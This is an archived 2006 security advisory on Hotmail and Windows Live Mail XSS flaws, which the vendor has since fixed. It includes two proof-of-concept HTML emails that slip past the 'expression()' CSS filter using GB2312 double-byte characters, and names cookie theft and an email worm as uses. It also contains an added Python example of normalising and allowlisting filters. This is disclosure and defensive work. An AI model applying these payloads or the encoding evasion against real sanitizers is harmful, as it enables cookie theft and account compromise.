hotmail_xss.txt

2006-11-07T00:00:00
ID PACKETSTORM:51717
Type packetstorm
Reporter Cheng Peng Su
Modified 2006-11-07T00:00:00

Description

Advisory Name : Hotmail and Windows Live Mail XSS Vulnerabilities   
Release Date : 2006.11.03  
Test On : Microsoft IE 6.0  
Discoverer : Cheng Peng Su(applesoup_at_gmail.com)  
  
Introduction:  
Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft.   
  
Details:  
  
Hotmail's filter looks for the "expression()" syntax in CSS attributes. According to Hasegawa Yosuke's post (http://archive.openmya.devnull.jp/2006.08/msg00369.html), in some character encodings (e.g. GB2312) certain double-byte characters can be substituted for the corresponding characters in "expression()". The result is a malformed CSS attribute in which Hotmail's filter fails to recognise, and therefore fails to strip, the "expression()" syntax.  
  
An example:  
  
Hotmail  
--------------------------------------------------  
MIME-Version: 1.0  
From: user<user@site.com>  
Content-Type: text/html; charset=GB2312  
Subject: example  
  
<img id='sss'>  
<input id='ttt' value="javascript:alert('xss')">  
<span style="font-family:[ascii 163][ascii 197]xpression[ascii 163][ascii 168]document.all.sss.src=document.all.ttt.value)">exploited</span>  
.  
--------------------------------------------------  
  
Windows Live Mail  
--------------------------------------------------  
MIME-Version: 1.0  
From: user<user@site.com>  
Content-Type: text/html; charset=GB2312  
Subject: example  
  
<img id='sss'>  
<input id='ttt' value="javascript:alert('xss')">  
<span style="font-family:[ascii 163][ascii 197]xpression[ascii 163][ascii 168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span>  
.  
--------------------------------------------------  
  
The code injected through the CSS attribute could be used for:  
- Stealing cookies.  
- A potential web-based e-mail worm.  
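The following is an added example, not part of the advisory or of Microsoft's code, showing from the filtering side why the substitution described in the Details section defeats a byte-level check and how a filter can avoid it. It assumes that the "[ascii 163][ascii 197]" and "[ascii 163][ascii 168]" pairs in the advisory are the raw GB2312 bytes 0xA3 0xC5 and 0xA3 0xA8, and builds a constructed sample style value from them. The function names (`naive_byte_filter`, `normalized_filter`, `allowlist_style`) and the allowlisted CSS properties are choices made for this example.

```python
import re
import unicodedata

# Constructed sample: the advisory's font-family value, with the two
# double-byte GB2312 characters written as raw bytes (0xA3 0xC5, 0xA3 0xA8).
SAMPLE_STYLE_GB2312 = (
    b"font-family:\xa3\xc5xpression\xa3\xa8"
    b"document.all.sss.src=document.all.ttt.value)"
)

# Pattern a blocklist-style filter typically looks for.
NAIVE_RE = re.compile(rb"expression\s*\(", re.IGNORECASE)
EXPRESSION_RE = re.compile(r"expression\s*\(", re.IGNORECASE)


def naive_byte_filter(style_bytes: bytes) -> bool:
    """Byte-level check of the kind the advisory describes: scan the raw
    bytes for the ASCII pattern 'expression('.  Returns True if found."""
    return NAIVE_RE.search(style_bytes) is not None


def decode_style(style_bytes: bytes, charset: str) -> str:
    """Decode the attribute value with the charset the message declares."""
    return style_bytes.decode(charset, errors="replace")


def normalized_filter(style_bytes: bytes, charset: str) -> bool:
    """Decode with the declared charset, then fold compatibility characters
    (fullwidth letters and parentheses in GB2312 row 3 map to plain ASCII
    under NFKC) before applying the same pattern.  Returns True if found."""
    folded = unicodedata.normalize("NFKC", decode_style(style_bytes, charset))
    return EXPRESSION_RE.search(folded) is not None


# Allowlist chosen for this example; a real filter would tune it.
SAFE_PROPERTIES = {"color", "font-family", "font-size", "font-weight", "text-align"}
# No parentheses, so neither url() nor expression() can appear in a value.
SAFE_VALUE_RE = re.compile(r"^[A-Za-z0-9 #,.%'\"-]+$")


def allowlist_style(style_text: str) -> bool:
    """Allowlist instead of blocklist: every declaration must name a known
    property and carry a value drawn from a conservative character set.
    NFKC folding is applied first so fullwidth look-alikes cannot slip by."""
    folded = unicodedata.normalize("NFKC", style_text)
    for decl in filter(None, (d.strip() for d in folded.split(";"))):
        prop, sep, value = decl.partition(":")
        if not sep or prop.strip().lower() not in SAFE_PROPERTIES:
            return False
        if not SAFE_VALUE_RE.fullmatch(value.strip()):
            return False
    return True


if __name__ == "__main__":
    print("decoded as GB2312 :", decode_style(SAMPLE_STYLE_GB2312, "gb2312"))
    print("naive byte filter :", naive_byte_filter(SAMPLE_STYLE_GB2312))
    print("normalized filter :", normalized_filter(SAMPLE_STYLE_GB2312, "gb2312"))
    print("allowlist verdict :", allowlist_style(decode_style(SAMPLE_STYLE_GB2312, "gb2312")))
```

Decoded as GB2312, 0xA3 0xC5 is U+FF25 (fullwidth "E") and 0xA3 0xA8 is U+FF08 (fullwidth "("), so the byte scan sees no "expression(" while the NFKC-folded text does. The allowlist version is the safer design: it never has to enumerate dangerous spellings, because anything outside the small accepted grammar is rejected.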
  
Vendor status:  
  
Microsoft was notified on Sep 25th, 2006.   
The bug is now fixed.   
  
Original advisory:  
  
http://applesoup.googlepages.com/hotmail_xss.txt  